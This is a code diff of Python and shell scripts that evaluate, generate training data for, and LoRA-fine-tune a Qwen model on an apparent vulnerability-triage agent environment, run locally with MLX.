if depth == 0:
|
| 49 |
+
candidate_start = index
|
| 50 |
+
depth += 1
|
| 51 |
+
elif ch == "}":
|
| 52 |
+
depth -= 1
|
| 53 |
+
if depth == 0 and candidate_start is not None:
|
| 54 |
+
last_candidate = cleaned[candidate_start : index + 1]
|
| 55 |
+
return last_candidate
|
| 56 |
+
|
| 57 |
+
|
| 58 |
+
def parse_action_output(text: str) -> Dict[str, object] | None:
|
| 59 |
+
candidate = extract_last_json_object(text)
|
| 60 |
+
if candidate is None:
|
| 61 |
+
return None
|
| 62 |
+
try:
|
| 63 |
+
payload = json.loads(candidate)
|
| 64 |
+
action = VulnTriageAction.model_validate(payload)
|
| 65 |
+
except Exception:
|
| 66 |
+
return None
|
| 67 |
+
return action.model_dump(exclude_none=True)
|
| 68 |
+
|
| 69 |
+
|
| 70 |
+
def next_action(model, tokenizer, observation: Dict[str, object]) -> Dict[str, object]:
|
| 71 |
+
prompt = render_prompt(
|
| 72 |
+
observation=observation,
|
| 73 |
+
prompt_variant="Return only the best next action in JSON.",
|
| 74 |
+
)
|
| 75 |
+
output = generate(
|
| 76 |
+
model,
|
| 77 |
+
tokenizer,
|
| 78 |
+
prompt=prompt,
|
| 79 |
+
verbose=False,
|
| 80 |
+
max_tokens=192,
|
| 81 |
+
sampler=make_sampler(temp=0.0),
|
| 82 |
+
)
|
| 83 |
+
payload = parse_action_output(output)
|
| 84 |
+
if payload is None:
|
| 85 |
+
return {
|
| 86 |
+
"action_type": "submit_triage",
|
| 87 |
+
"rationale": f"Fallback because model output could not be parsed: {output[:120]}",
|
| 88 |
+
}
|
| 89 |
+
return payload
|
| 90 |
+
|
| 91 |
+
|
| 92 |
+
def run_episode(model, tokenizer, task_id: str) -> Dict[str, object]:
|
| 93 |
+
env = VulnTriageEnvironment()
|
| 94 |
+
observation = env.reset(task_id=task_id).model_dump()
|
| 95 |
+
actions: List[Dict[str, object]] = []
|
| 96 |
+
while not observation["done"]:
|
| 97 |
+
action_payload = next_action(model, tokenizer, observation)
|
| 98 |
+
action = VulnTriageAction.model_validate(action_payload)
|
| 99 |
+
actions.append(action.model_dump(exclude_none=True))
|
| 100 |
+
observation = env.step(action).model_dump()
|
| 101 |
+
return {
|
| 102 |
+
"task_id": task_id,
|
| 103 |
+
"difficulty": observation["difficulty"],
|
| 104 |
+
"final_score": float(observation.get("final_score") or 0.0),
|
| 105 |
+
"score_breakdown": observation["score_breakdown"],
|
| 106 |
+
"steps_used": len(actions),
|
| 107 |
+
"actions": actions,
|
| 108 |
+
}
|
| 109 |
+
|
| 110 |
+
|
| 111 |
+
def main() -> None:
|
| 112 |
+
parser = argparse.ArgumentParser()
|
| 113 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 114 |
+
parser.add_argument("--adapter-path")
|
| 115 |
+
parser.add_argument("--output-json")
|
| 116 |
+
args = parser.parse_args()
|
| 117 |
+
|
| 118 |
+
model, tokenizer = load(args.model, adapter_path=args.adapter_path)
|
| 119 |
+
episodes = [run_episode(model, tokenizer, task_id) for task_id in TASK_ORDER]
|
| 120 |
+
average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
|
| 121 |
+
payload = {
|
| 122 |
+
"model": args.model,
|
| 123 |
+
"adapter_path": args.adapter_path,
|
| 124 |
+
"average_score": average_score,
|
| 125 |
+
"episodes": episodes,
|
| 126 |
+
}
|
| 127 |
+
if args.output_json:
|
| 128 |
+
out = Path(args.output_json)
|
| 129 |
+
if not out.is_absolute():
|
| 130 |
+
out = (ROOT / out).resolve()
|
| 131 |
+
out.parent.mkdir(parents=True, exist_ok=True)
|
| 132 |
+
out.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 133 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 134 |
+
|
| 135 |
+
|
| 136 |
+
if __name__ == "__main__":
|
| 137 |
+
main()
|
scripts/generate_sft_data.py
ADDED
|
@@ -0,0 +1,116 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Generate resumable SFT data from deterministic heuristic rollouts."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import sys
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
|
| 10 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 11 |
+
if str(ROOT) not in sys.path:
|
| 12 |
+
sys.path.insert(0, str(ROOT))
|
| 13 |
+
|
| 14 |
+
from training_utils import (
|
| 15 |
+
PROMPT_VARIANTS,
|
| 16 |
+
append_jsonl,
|
| 17 |
+
build_text_example,
|
| 18 |
+
generate_heuristic_transitions,
|
| 19 |
+
split_for_key,
|
| 20 |
+
write_json,
|
| 21 |
+
)
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
def main() -> None:
|
| 25 |
+
parser = argparse.ArgumentParser()
|
| 26 |
+
parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
|
| 27 |
+
parser.add_argument("--augmentations", type=int, default=12)
|
| 28 |
+
parser.add_argument("--eval-ratio", type=float, default=0.2)
|
| 29 |
+
parser.add_argument("--force", action="store_true")
|
| 30 |
+
args = parser.parse_args()
|
| 31 |
+
|
| 32 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 33 |
+
data_dir = output_root / "data"
|
| 34 |
+
transitions_path = data_dir / "transitions.jsonl"
|
| 35 |
+
train_path = data_dir / "train.jsonl"
|
| 36 |
+
eval_path = data_dir / "eval.jsonl"
|
| 37 |
+
manifest_path = output_root / "run_manifest.json"
|
| 38 |
+
|
| 39 |
+
if args.force:
|
| 40 |
+
for path in (transitions_path, train_path, eval_path):
|
| 41 |
+
if path.exists():
|
| 42 |
+
path.unlink()
|
| 43 |
+
|
| 44 |
+
if transitions_path.exists() and train_path.exists() and eval_path.exists():
|
| 45 |
+
print(json.dumps({"status": "already_exists", "output_root": str(output_root)}, indent=2))
|
| 46 |
+
return
|
| 47 |
+
|
| 48 |
+
transition_count = 0
|
| 49 |
+
train_examples = 0
|
| 50 |
+
eval_examples = 0
|
| 51 |
+
|
| 52 |
+
for transition in generate_heuristic_transitions():
|
| 53 |
+
record = {
|
| 54 |
+
"task_id": transition.task_id,
|
| 55 |
+
"difficulty": transition.difficulty,
|
| 56 |
+
"step_index": transition.step_index,
|
| 57 |
+
"observation": transition.observation,
|
| 58 |
+
"action": transition.action,
|
| 59 |
+
"reward_after_action": transition.reward_after_action,
|
| 60 |
+
"score_after_action": transition.score_after_action,
|
| 61 |
+
"done": transition.done,
|
| 62 |
+
}
|
| 63 |
+
append_jsonl(transitions_path, record)
|
| 64 |
+
transition_count += 1
|
| 65 |
+
|
| 66 |
+
for augmentation_index in range(args.augmentations):
|
| 67 |
+
prompt_variant = PROMPT_VARIANTS[augmentation_index % len(PROMPT_VARIANTS)]
|
| 68 |
+
example = build_text_example(
|
| 69 |
+
observation=transition.observation,
|
| 70 |
+
action=transition.action,
|
| 71 |
+
prompt_variant=prompt_variant,
|
| 72 |
+
)
|
| 73 |
+
example_record = {
|
| 74 |
+
"id": f"{transition.task_id}-step{transition.step_index}-aug{augmentation_index}",
|
| 75 |
+
"task_id": transition.task_id,
|
| 76 |
+
"difficulty": transition.difficulty,
|
| 77 |
+
"step_index": transition.step_index,
|
| 78 |
+
"prompt_variant": prompt_variant,
|
| 79 |
+
**example,
|
| 80 |
+
}
|
| 81 |
+
split = split_for_key(example_record["id"], args.eval_ratio)
|
| 82 |
+
append_jsonl(train_path if split == "train" else eval_path, example_record)
|
| 83 |
+
if split == "train":
|
| 84 |
+
train_examples += 1
|
| 85 |
+
else:
|
| 86 |
+
eval_examples += 1
|
| 87 |
+
|
| 88 |
+
write_json(
|
| 89 |
+
manifest_path,
|
| 90 |
+
{
|
| 91 |
+
"status": "data_ready",
|
| 92 |
+
"output_root": str(output_root),
|
| 93 |
+
"transition_count": transition_count,
|
| 94 |
+
"train_examples": train_examples,
|
| 95 |
+
"eval_examples": eval_examples,
|
| 96 |
+
"augmentations": args.augmentations,
|
| 97 |
+
"eval_ratio": args.eval_ratio,
|
| 98 |
+
},
|
| 99 |
+
)
|
| 100 |
+
|
| 101 |
+
print(
|
| 102 |
+
json.dumps(
|
| 103 |
+
{
|
| 104 |
+
"status": "ok",
|
| 105 |
+
"output_root": str(output_root),
|
| 106 |
+
"transition_count": transition_count,
|
| 107 |
+
"train_examples": train_examples,
|
| 108 |
+
"eval_examples": eval_examples,
|
| 109 |
+
},
|
| 110 |
+
indent=2,
|
| 111 |
+
)
|
| 112 |
+
)
|
| 113 |
+
|
| 114 |
+
|
| 115 |
+
if __name__ == "__main__":
|
| 116 |
+
main()
|
scripts/prepare_mlx_data.py
ADDED
|
@@ -0,0 +1,145 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Prepare MLX-LM-compatible train/valid files from existing SFT data."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
from pathlib import Path
|
| 8 |
+
from typing import Dict, List
|
| 9 |
+
|
| 10 |
+
from transformers import AutoTokenizer
|
| 11 |
+
|
| 12 |
+
|
| 13 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 14 |
+
TRUNCATION_MARKER = "\n...[truncated observation]...\n"
|
| 15 |
+
|
| 16 |
+
|
| 17 |
+
def load_jsonl(path: Path) -> List[Dict[str, object]]:
|
| 18 |
+
with path.open("r", encoding="utf-8") as handle:
|
| 19 |
+
return [json.loads(line) for line in handle if line.strip()]
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
def dump_jsonl(path: Path, rows: List[Dict[str, object]]) -> None:
|
| 23 |
+
path.parent.mkdir(parents=True, exist_ok=True)
|
| 24 |
+
with path.open("w", encoding="utf-8") as handle:
|
| 25 |
+
for row in rows:
|
| 26 |
+
handle.write(json.dumps(row, sort_keys=True) + "\n")
|
| 27 |
+
|
| 28 |
+
|
| 29 |
+
def trim_prompt_to_budget(prompt: str, tokenizer, budget: int) -> str:
|
| 30 |
+
prompt_ids = tokenizer.encode(prompt, add_special_tokens=False)
|
| 31 |
+
if len(prompt_ids) <= budget:
|
| 32 |
+
return prompt
|
| 33 |
+
|
| 34 |
+
marker_ids = tokenizer.encode(TRUNCATION_MARKER, add_special_tokens=False)
|
| 35 |
+
marker_len = len(marker_ids)
|
| 36 |
+
if budget <= marker_len + 8:
|
| 37 |
+
return tokenizer.decode(prompt_ids[-budget:])
|
| 38 |
+
|
| 39 |
+
remaining = budget - marker_len
|
| 40 |
+
head_len = max(1, int(remaining * 0.55))
|
| 41 |
+
tail_len = max(1, remaining - head_len)
|
| 42 |
+
trimmed_ids = prompt_ids[:head_len] + marker_ids + prompt_ids[-tail_len:]
|
| 43 |
+
if len(trimmed_ids) > budget:
|
| 44 |
+
trimmed_ids = trimmed_ids[:budget]
|
| 45 |
+
return tokenizer.decode(trimmed_ids, skip_special_tokens=False)
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
def rendered_length(prompt: str, completion: str, tokenizer) -> int:
|
| 49 |
+
messages = [
|
| 50 |
+
{"role": "user", "content": prompt},
|
| 51 |
+
{"role": "assistant", "content": completion},
|
| 52 |
+
]
|
| 53 |
+
return len(tokenizer.apply_chat_template(messages, return_dict=False))
|
| 54 |
+
|
| 55 |
+
|
| 56 |
+
def normalize_record(record: Dict[str, object], tokenizer, max_seq_length: int) -> tuple[Dict[str, object] | None, Dict[str, int]]:
|
| 57 |
+
prompt = str(record["prompt"])
|
| 58 |
+
completion = str(record["completion"])
|
| 59 |
+
|
| 60 |
+
stats = {"trimmed": 0, "dropped": 0}
|
| 61 |
+
completion_ids = tokenizer.encode(completion, add_special_tokens=False)
|
| 62 |
+
prompt_budget = max_seq_length - len(completion_ids) - 32
|
| 63 |
+
if prompt_budget <= 0:
|
| 64 |
+
stats["dropped"] = 1
|
| 65 |
+
return None, stats
|
| 66 |
+
|
| 67 |
+
normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
|
| 68 |
+
while rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length and prompt_budget > 64:
|
| 69 |
+
prompt_budget = max(64, int(prompt_budget * 0.9))
|
| 70 |
+
normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
|
| 71 |
+
if rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length:
|
| 72 |
+
stats["dropped"] = 1
|
| 73 |
+
return None, stats
|
| 74 |
+
|
| 75 |
+
if normalized_prompt != prompt:
|
| 76 |
+
stats["trimmed"] = 1
|
| 77 |
+
|
| 78 |
+
text = f"{normalized_prompt}\n{completion}"
|
| 79 |
+
normalized = dict(record)
|
| 80 |
+
normalized["prompt"] = normalized_prompt
|
| 81 |
+
normalized["text"] = text
|
| 82 |
+
return normalized, stats
|
| 83 |
+
|
| 84 |
+
|
| 85 |
+
def transform_split(src: Path, dst: Path, tokenizer, max_seq_length: int) -> Dict[str, int]:
|
| 86 |
+
rows = load_jsonl(src)
|
| 87 |
+
normalized_rows: List[Dict[str, object]] = []
|
| 88 |
+
stats = {"input_examples": len(rows), "written_examples": 0, "trimmed_examples": 0, "dropped_examples": 0}
|
| 89 |
+
|
| 90 |
+
for row in rows:
|
| 91 |
+
normalized, row_stats = normalize_record(row, tokenizer, max_seq_length)
|
| 92 |
+
stats["trimmed_examples"] += row_stats["trimmed"]
|
| 93 |
+
stats["dropped_examples"] += row_stats["dropped"]
|
| 94 |
+
if normalized is not None:
|
| 95 |
+
normalized_rows.append(normalized)
|
| 96 |
+
|
| 97 |
+
stats["written_examples"] = len(normalized_rows)
|
| 98 |
+
dump_jsonl(dst, normalized_rows)
|
| 99 |
+
return stats
|
| 100 |
+
|
| 101 |
+
|
| 102 |
+
def main() -> None:
|
| 103 |
+
parser = argparse.ArgumentParser()
|
| 104 |
+
parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
|
| 105 |
+
parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b/data")
|
| 106 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 107 |
+
parser.add_argument("--max-seq-length", type=int, default=1024)
|
| 108 |
+
parser.add_argument("--include-valid", action="store_true")
|
| 109 |
+
parser.add_argument("--force", action="store_true")
|
| 110 |
+
args = parser.parse_args()
|
| 111 |
+
|
| 112 |
+
source_root = (ROOT / args.source_root).resolve()
|
| 113 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 114 |
+
output_root.mkdir(parents=True, exist_ok=True)
|
| 115 |
+
|
| 116 |
+
tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
|
| 117 |
+
|
| 118 |
+
mapping = {source_root / "train.jsonl": output_root / "train.jsonl"}
|
| 119 |
+
if args.include_valid:
|
| 120 |
+
mapping[source_root / "eval.jsonl"] = output_root / "valid.jsonl"
|
| 121 |
+
|
| 122 |
+
summary: Dict[str, object] = {
|
| 123 |
+
"model": args.model,
|
| 124 |
+
"max_seq_length": args.max_seq_length,
|
| 125 |
+
"splits": {},
|
| 126 |
+
}
|
| 127 |
+
for src, dst in mapping.items():
|
| 128 |
+
if not src.exists():
|
| 129 |
+
raise FileNotFoundError(f"Missing source file: {src}")
|
| 130 |
+
if dst.exists() and not args.force:
|
| 131 |
+
continue
|
| 132 |
+
summary["splits"][dst.stem] = transform_split(src, dst, tokenizer, args.max_seq_length)
|
| 133 |
+
|
| 134 |
+
valid_path = output_root / "valid.jsonl"
|
| 135 |
+
if not args.include_valid and valid_path.exists():
|
| 136 |
+
valid_path.unlink()
|
| 137 |
+
|
| 138 |
+
summary_path = output_root.parent / "prepare_stats.json"
|
| 139 |
+
summary_path.write_text(json.dumps(summary, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 140 |
+
print(output_root)
|
| 141 |
+
print(json.dumps(summary, indent=2, sort_keys=True))
|
| 142 |
+
|
| 143 |
+
|
| 144 |
+
if __name__ == "__main__":
|
| 145 |
+
main()
|
scripts/run_lora_pipeline.py
ADDED
|
@@ -0,0 +1,135 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Run the full resumable local LoRA pipeline."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import subprocess
|
| 8 |
+
import sys
|
| 9 |
+
from pathlib import Path
|
| 10 |
+
|
| 11 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 12 |
+
if str(ROOT) not in sys.path:
|
| 13 |
+
sys.path.insert(0, str(ROOT))
|
| 14 |
+
|
| 15 |
+
from training_utils import latest_checkpoint, write_json
|
| 16 |
+
|
| 17 |
+
|
| 18 |
+
def run_step(name: str, command: list[str], log_path: Path, output_root: Path) -> None:
|
| 19 |
+
log_path.parent.mkdir(parents=True, exist_ok=True)
|
| 20 |
+
with log_path.open("a", encoding="utf-8") as log_handle:
|
| 21 |
+
log_handle.write(f"\n===== {name} =====\n")
|
| 22 |
+
log_handle.flush()
|
| 23 |
+
write_json(
|
| 24 |
+
output_root / "run_manifest.json",
|
| 25 |
+
{
|
| 26 |
+
"status": "running_step",
|
| 27 |
+
"current_step": name,
|
| 28 |
+
"command": command,
|
| 29 |
+
"latest_checkpoint": str(latest_checkpoint(output_root / "checkpoints")) if (output_root / "checkpoints").exists() else None,
|
| 30 |
+
},
|
| 31 |
+
)
|
| 32 |
+
process = subprocess.run(command, stdout=log_handle, stderr=subprocess.STDOUT, text=True)
|
| 33 |
+
if process.returncode != 0:
|
| 34 |
+
raise SystemExit(process.returncode)
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
def main() -> None:
|
| 38 |
+
parser = argparse.ArgumentParser()
|
| 39 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 40 |
+
parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
|
| 41 |
+
parser.add_argument("--augmentations", type=int, default=12)
|
| 42 |
+
parser.add_argument("--skip-base-eval", action="store_true")
|
| 43 |
+
args = parser.parse_args()
|
| 44 |
+
|
| 45 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 46 |
+
logs_dir = output_root / "logs"
|
| 47 |
+
output_root.mkdir(parents=True, exist_ok=True)
|
| 48 |
+
|
| 49 |
+
if not args.skip_base_eval and not (output_root / "metrics" / "eval_before.json").exists():
|
| 50 |
+
run_step(
|
| 51 |
+
"eval_base",
|
| 52 |
+
[
|
| 53 |
+
sys.executable,
|
| 54 |
+
"scripts/evaluate_lora.py",
|
| 55 |
+
"--model",
|
| 56 |
+
args.model,
|
| 57 |
+
"--output-root",
|
| 58 |
+
str(output_root),
|
| 59 |
+
"--output-json",
|
| 60 |
+
str(output_root / "metrics" / "eval_before.json"),
|
| 61 |
+
],
|
| 62 |
+
logs_dir / "eval_base.log",
|
| 63 |
+
output_root,
|
| 64 |
+
)
|
| 65 |
+
|
| 66 |
+
if not (output_root / "data" / "train.jsonl").exists():
|
| 67 |
+
run_step(
|
| 68 |
+
"generate_data",
|
| 69 |
+
[
|
| 70 |
+
sys.executable,
|
| 71 |
+
"scripts/generate_sft_data.py",
|
| 72 |
+
"--output-root",
|
| 73 |
+
str(output_root),
|
| 74 |
+
"--augmentations",
|
| 75 |
+
str(args.augmentations),
|
| 76 |
+
],
|
| 77 |
+
logs_dir / "generate_data.log",
|
| 78 |
+
output_root,
|
| 79 |
+
)
|
| 80 |
+
|
| 81 |
+
run_step(
|
| 82 |
+
"train_lora",
|
| 83 |
+
[
|
| 84 |
+
sys.executable,
|
| 85 |
+
"scripts/train_lora_sft.py",
|
| 86 |
+
"--model",
|
| 87 |
+
args.model,
|
| 88 |
+
"--output-root",
|
| 89 |
+
str(output_root),
|
| 90 |
+
],
|
| 91 |
+
logs_dir / "train_lora.log",
|
| 92 |
+
output_root,
|
| 93 |
+
)
|
| 94 |
+
|
| 95 |
+
run_step(
|
| 96 |
+
"eval_adapter",
|
| 97 |
+
[
|
| 98 |
+
sys.executable,
|
| 99 |
+
"scripts/evaluate_lora.py",
|
| 100 |
+
"--model",
|
| 101 |
+
args.model,
|
| 102 |
+
"--adapter-path",
|
| 103 |
+
str(output_root / "adapter"),
|
| 104 |
+
"--output-root",
|
| 105 |
+
str(output_root),
|
| 106 |
+
"--output-json",
|
| 107 |
+
str(output_root / "metrics" / "eval_after.json"),
|
| 108 |
+
],
|
| 109 |
+
logs_dir / "eval_adapter.log",
|
| 110 |
+
output_root,
|
| 111 |
+
)
|
| 112 |
+
|
| 113 |
+
write_json(
|
| 114 |
+
output_root / "run_manifest.json",
|
| 115 |
+
{
|
| 116 |
+
"status": "finished",
|
| 117 |
+
"output_root": str(output_root),
|
| 118 |
+
"eval_before": str(output_root / "metrics" / "eval_before.json"),
|
| 119 |
+
"training_summary": str(output_root / "training_summary.json"),
|
| 120 |
+
"eval_after": str(output_root / "metrics" / "eval_after.json"),
|
| 121 |
+
},
|
| 122 |
+
)
|
| 123 |
+
print(
|
| 124 |
+
json.dumps(
|
| 125 |
+
{
|
| 126 |
+
"status": "finished",
|
| 127 |
+
"output_root": str(output_root),
|
| 128 |
+
},
|
| 129 |
+
indent=2,
|
| 130 |
+
)
|
| 131 |
+
)
|
| 132 |
+
|
| 133 |
+
|
| 134 |
+
if __name__ == "__main__":
|
| 135 |
+
main()
|
scripts/run_mlx_benchmark.sh
ADDED
|
@@ -0,0 +1,29 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/bin/zsh
|
| 2 |
+
set -euo pipefail
|
| 3 |
+
|
| 4 |
+
ROOT="/Users/adithyavardhan/Tweeks/hack"
|
| 5 |
+
cd "$ROOT"
|
| 6 |
+
|
| 7 |
+
python scripts/prepare_mlx_data.py --force
|
| 8 |
+
mkdir -p artifacts/mlx_qwen3_4b/logs artifacts/mlx_qwen3_4b/metrics artifacts/mlx_qwen3_4b/adapters
|
| 9 |
+
|
| 10 |
+
python -m mlx_lm lora \
|
| 11 |
+
--model Qwen/Qwen3.5-4B \
|
| 12 |
+
--train \
|
| 13 |
+
--data "$ROOT/artifacts/mlx_qwen3_4b/data" \
|
| 14 |
+
--mask-prompt \
|
| 15 |
+
--num-layers 8 \
|
| 16 |
+
--batch-size 1 \
|
| 17 |
+
--iters 10 \
|
| 18 |
+
--val-batches 2 \
|
| 19 |
+
--learning-rate 5e-5 \
|
| 20 |
+
--steps-per-report 1 \
|
| 21 |
+
--steps-per-eval 1000 \
|
| 22 |
+
--save-every 10 \
|
| 23 |
+
--grad-accumulation-steps 8 \
|
| 24 |
+
--grad-checkpoint \
|
| 25 |
+
--adapter-path "$ROOT/artifacts/mlx_qwen3_4b/adapters" \
|
| 26 |
+
--max-seq-length 1024 \
|
| 27 |
+
> "$ROOT/artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log" 2>&1
|
| 28 |
+
|
| 29 |
+
python scripts/save_mlx_speed.py
|
scripts/run_mlx_training.py
ADDED
|
@@ -0,0 +1,147 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
